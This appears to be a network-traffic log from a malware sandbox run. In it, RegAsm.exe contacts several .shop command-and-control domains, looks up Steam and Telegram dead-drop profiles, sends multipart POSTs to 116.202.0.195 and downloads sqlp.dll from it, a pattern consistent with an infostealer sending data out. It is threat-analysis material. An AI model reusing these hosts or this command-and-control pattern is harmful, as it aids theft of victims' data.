    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=jhi340vq4h2b9t567rb2cl7ie1; expires=Mon, 13 Jan 2025 17:20:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTWcUe9Kpdgiul%2BYDvigYsiIK4ZhIv5LBy4OWr12Yla%2FI%2FGbh5qWv8htMDwsfBYOCq2RbWM2D6rRVgytaFzOSRzKDmkm7Q9gu1Bgst2MaudiMTKhJycTg1lql6EjqsvTXTRMIbeCZg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d617f792663f2-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    81.173.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.173.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    puredoffustow.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    puredoffustow.shop
    IN A
    Response
    puredoffustow.shop
    IN A
    172.67.211.222
    puredoffustow.shop
    IN A
    104.21.85.226
  • flag-us
    POST
    https://puredoffustow.shop/api
    RegAsm.exe
    Remote address:
    172.67.211.222:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: puredoffustow.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=qkisigakqhd2vtn1b48aogm2ur; expires=Mon, 13 Jan 2025 17:20:07 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9%2F%2F1upMc%2FdThgCh3LCwNV8bl%2B5Drxqnx6MBMV%2FW57XaDsdSo3bCqZg5zJqmUCK1p27YzmkKYZLKgJGDT9RREe6Pa3BUlyJvypL%2FKGq5o5qiUlr1GX%2Bw762ROqyI8LUYZ6lM9kE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d6181ddd63866-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    opponnentduei.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    opponnentduei.shop
    IN A
    Response
    opponnentduei.shop
    IN A
    172.67.209.183
    opponnentduei.shop
    IN A
    104.21.45.51
  • flag-us
    POST
    https://opponnentduei.shop/api
    RegAsm.exe
    Remote address:
    172.67.209.183:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: opponnentduei.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=o2v40gp697nuocpd7hbqgmv91r; expires=Mon, 13 Jan 2025 17:20:07 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blD0tK%2B1NBoYbt%2BIfY%2BsCpuXhsrnT8tALUR5xgfWYmGt6W4%2ByBpgeH9uriAHxQy9G5ms24iWHvqprwbdsq8fmQIEoKxGJK%2BOAtswUkghRIFo6irCm6k5TEKuirX5b1bch7UE9ko%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d6184186d718c-LHR
  • [US] DNS  77.39.21.104.in-addr.arpa  via 8.8.8.8:53
    Q: 77.39.21.104.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  222.211.67.172.in-addr.arpa  via 8.8.8.8:53
    Q: 222.211.67.172.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  metallygaricwo.shop  (RegAsm.exe)  via 8.8.8.8:53
    Q: metallygaricwo.shop IN A
    A: 104.21.75.242, 172.67.184.9
  • [US] POST https://metallygaricwo.shop/api  (RegAsm.exe)  remote 104.21.75.242:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: metallygaricwo.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=abkv351bojgqfvak024bo1l94t; expires=Mon, 13 Jan 2025 17:20:07 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yelfb%2BRrvcHHGCnZRHPgVfnHYYcX5I1gt59s%2BHdvfWrDCAaWFm9qf7yUQN4Tr2JSzRjZGiHac0Gb0GVRWA3SIIPECk9amtB%2ByBbsq7XF13uiGmuMqLOOWYQr4FUpy4Fwa60HmDxC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d61865b3188b6-LHR
  • [US] DNS  milldymarskwom.shop  (RegAsm.exe)  via 8.8.8.8:53
    Q: milldymarskwom.shop IN A
    A: 104.21.50.100, 172.67.204.182
  • [US] POST https://milldymarskwom.shop/api  (RegAsm.exe)  remote 104.21.50.100:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: milldymarskwom.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=c79tp04qgmsekmm31qn12fq255; expires=Mon, 13 Jan 2025 17:20:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lQlMOooE84WMIl4qlC99ug2OhOjgspDwWsRSulwAuE%2F%2FCphvfFMoKqQG%2Bv8P23ia8nzhXtn0Aq5vXfYZTWXIff2HuA8zsS8ELbRyWNWB11H6ei3KrQZurCkTOJfYMS6PUjHjrIp"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d61889c8c63aa-LHR
    alt-svc: h3=":443"; ma=86400
  • [US] DNS  quotamkdsdqo.shop  (RegAsm.exe)  via 8.8.8.8:53
    Q: quotamkdsdqo.shop IN A
    A: 104.21.37.45, 172.67.203.241
  • [US] POST https://quotamkdsdqo.shop/api  (RegAsm.exe)  remote 104.21.37.45:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: quotamkdsdqo.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=gvkk6n7aj1rar8e48uorfnef1v; expires=Mon, 13 Jan 2025 17:20:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXqfg33u4ULmtQa9zI3SG1%2Fbvj78SWAV8FmT8yJ0kU6R3VPDXCpPgqENvNF4iw9WA3TC6u9lNihevNE6nkoLCnNkdUC6bP3d8vehW2XDwTphzLFuv6vkpYU95sCQbWBCEBVHMw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d618add0593fa-LHR
    alt-svc: h3=":443"; ma=86400
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 499
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [US] DNS  242.75.21.104.in-addr.arpa  via 8.8.8.8:53
    Q: 242.75.21.104.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  183.209.67.172.in-addr.arpa  via 8.8.8.8:53
    Q: 183.209.67.172.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  100.50.21.104.in-addr.arpa  via 8.8.8.8:53
    Q: 100.50.21.104.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  45.37.21.104.in-addr.arpa  via 8.8.8.8:53
    Q: 45.37.21.104.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  carrtychaintnyw.shop  (RegAsm.exe)  via 8.8.8.8:53
    Q: carrtychaintnyw.shop IN A
    A: 172.67.192.105, 104.21.81.254
  • [US] POST https://carrtychaintnyw.shop/api  (RegAsm.exe)  remote 172.67.192.105:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: carrtychaintnyw.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=f9fd3jc46h67nhnp6aipdl06ia; expires=Mon, 13 Jan 2025 17:20:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpi5%2FQbDdHMF6kXSvknvSA0MhQRdT%2FoNLS3p6oPgaER1kN3C4bp5le3ADTLExto%2FMern7trspn9KtE%2FxMm3uyHH5%2BncDuzcdBOEsLI%2F4eUluSey1eV6%2FITMlUzyVoMtnjJreiHXPIg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d618d0e8853a4-LHR
    alt-svc: h3=":443"; ma=86400
  • [US] DNS  steamcommunity.com  (RegAsm.exe)  via 8.8.8.8:53
    Q: steamcommunity.com IN A
    A: 104.82.131.75
  • [GB] GET https://steamcommunity.com/profiles/76561199724331900  (RegAsm.exe)  remote 104.82.131.75:443
    Request
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Thu, 19 Sep 2024 23:33:30 GMT
    Content-Length: 34734
    Connection: keep-alive
    Set-Cookie: sessionid=a87144ae6d6cb5c7b4ca48f1; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=GB%7C0cca5b35055ce513436d8b708d875660; Path=/; Secure; HttpOnly; SameSite=None
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [US] DNS  genedjestytw.shop  (RegAsm.exe)  via 8.8.8.8:53
    Q: genedjestytw.shop IN A
    A: (none)
  • [US] DNS  105.192.67.172.in-addr.arpa  via 8.8.8.8:53
    Q: 105.192.67.172.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  75.131.82.104.in-addr.arpa  via 8.8.8.8:53
    Q: 75.131.82.104.in-addr.arpa IN PTR
    A: a104-82-131-75.deploy.static.akamaitechnologies.com
  • [US] DNS  gacan.zapto.org  (RegAsm.exe)  via 8.8.8.8:53
    Q: gacan.zapto.org IN A
    A: (none)
  • [US] DNS  t.me  (RegAsm.exe)  via 8.8.8.8:53
    Q: t.me IN A
    A: 149.154.167.99
  • [NL] GET https://t.me/edm0d  (RegAsm.exe)  remote 149.154.167.99:443
    Request
    GET /edm0d HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: stel_ssid=d92373b31a9965fef1_17716598562039938540
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 19 Sep 2024 23:33:31 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12287
    Connection: keep-alive
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • [DE] GET https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 4789
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [DE] GET https://116.202.0.195/sqlp.dll  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    GET /sqlp.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:34 GMT
    Content-Type: application/octet-stream
    Content-Length: 2459136
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:34 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • [DE] POST https://116.202.0.195/  (RegAsm.exe)  remote 116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • [US] DNS  50.23.12.20.in-addr.arpa  via 8.8.8.8:53
    Q: 50.23.12.20.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  198.187.3.20.in-addr.arpa  via 8.8.8.8:53
    Q: 198.187.3.20.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  18.134.221.88.in-addr.arpa  via 8.8.8.8:53
    Q: 18.134.221.88.in-addr.arpa IN PTR
    A: a88-221-134-18.deploy.static.akamaitechnologies.com
  • [US] DNS  25.140.123.92.in-addr.arpa  via 8.8.8.8:53
    Q: 25.140.123.92.in-addr.arpa IN PTR
    A: a92-123-140-25.deploy.static.akamaitechnologies.com
  • [US] DNS  48.229.111.52.in-addr.arpa  via 8.8.8.8:53
    Q: 48.229.111.52.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  205.47.74.20.in-addr.arpa  via 8.8.8.8:53
    Q: 205.47.74.20.in-addr.arpa IN PTR
    A: (none)
  • [US] DNS  tse1.mm.bing.net  via 8.8.8.8:53
    Q: tse1.mm.bing.net IN A
    A: tse1.mm.bing.net CNAME mm-mm.bing.net.trafficmanager.net
       mm-mm.bing.net.trafficmanager.net CNAME ax-0001.ax-msedge.net
       ax-0001.ax-msedge.net A 150.171.27.10, 150.171.28.10
  • [US] DNS  tse1.mm.bing.net  via 8.8.8.8:53
    Q: tse1.mm.bing.net IN A
    A: tse1.mm.bing.net CNAME mm-mm.bing.net.trafficmanager.net
       mm-mm.bing.net.trafficmanager.net CNAME ax-0001.ax-msedge.net
       ax-0001.ax-msedge.net A 150.171.28.10, 150.171.27.10
  • [US] GET https://tse1.mm.bing.net/th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90  remote 150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 431275
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 93FCC04E4E994DC8BFBB99542087E108 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • [US] GET https://tse1.mm.bing.net/th?id=OADD2.10239317300897_1II1YIPQNQ7MCYUAK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90  remote 150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317300897_1II1YIPQNQ7MCYUAK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 411186
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F328A215B1AD49AFB3A0F5B7BEB19B33 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • [US] GET https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90  remote 150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 315631
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D9803D317DCA452FA8A86F274D73F0B7 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • [US] GET https://tse1.mm.bing.net/th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90  remote 150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
